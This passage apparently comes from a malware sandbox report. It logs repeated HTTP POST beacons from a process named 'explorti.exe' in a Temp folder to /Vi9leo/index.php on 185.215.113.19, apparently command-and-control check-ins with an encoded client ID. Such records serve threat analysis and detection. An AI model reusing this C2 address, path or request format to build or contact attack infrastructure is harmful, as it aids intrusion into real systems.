Jul 26, 2024 21:05:05.447463036 CEST	80	56774	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:05.689827919 CEST	80	56774	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:05.689896107 CEST	56774	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:05.822242975 CEST	56774	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:05.822911978 CEST	56775	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:05.828202009 CEST	80	56775	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:05.828265905 CEST	56775	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:05.828634024 CEST	56775	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:05.829708099 CEST	80	56774	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:05.829792976 CEST	56774	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:05.835663080 CEST	80	56775	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:06.668731928 CEST	80	56775	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:06.668981075 CEST	56775	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:06.672281027 CEST	56775	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:06.672842026 CEST	56776	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:06.677839041 CEST	80	56776	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:06.677911043 CEST	80	56775	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:06.677942038 CEST	56776	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:06.677968025 CEST	56775	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:06.678340912 CEST	56776	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:06.683279037 CEST	80	56776	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:07.445532084 CEST	80	56776	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:07.445591927 CEST	56776	80	192.168.2.6	185.215.113.19
Jul 26, 2024 21:05:13.585148096 CEST	80	56776	185.215.113.19	192.168.2.6
Jul 26, 2024 21:05:13.585199118 CEST	56776	80	192.168.2.6	185.215.113.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 21:03:44.505718946 CEST	53	52335	162.159.36.2	192.168.2.6
Jul 26, 2024 21:03:45.040390015 CEST	53	57968	1.1.1.1	192.168.2.6

HTTP Request Dependency Graph

185.215.113.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	56720	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:03.898607969 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:04.757033110 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:04.759771109 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:05.033510923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	56721	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:05.156424999 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:05.945589066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:05.946383953 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:06.197446108 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	56722	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:06.311816931 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:07.071187973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:07.072134972 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:07.320554018 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	56723	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:07.435200930 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:08.216475010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:08.217242956 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:08.468384027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	56724	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:08.576247931 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:09.346618891 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:09.347385883 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:09.603142977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	56725	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:09.725866079 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:10.475296974 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:10.476126909 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:10.725986004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	56726	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:10.864510059 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:11.658538103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:11.660892010 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:11.917367935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	56727	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:12.029055119 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:12.786170959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:12.789001942 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:13.040823936 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	56728	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:13.158479929 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:13.939603090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:13.940890074 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:14.189249039 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	56729	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:14.311000109 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:15.097166061 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:15.098040104 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:15.351702929 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	56731	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:15.497006893 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:16.307485104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:16.308510065 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:16.559497118 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	56732	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:16.672704935 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:17.432195902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
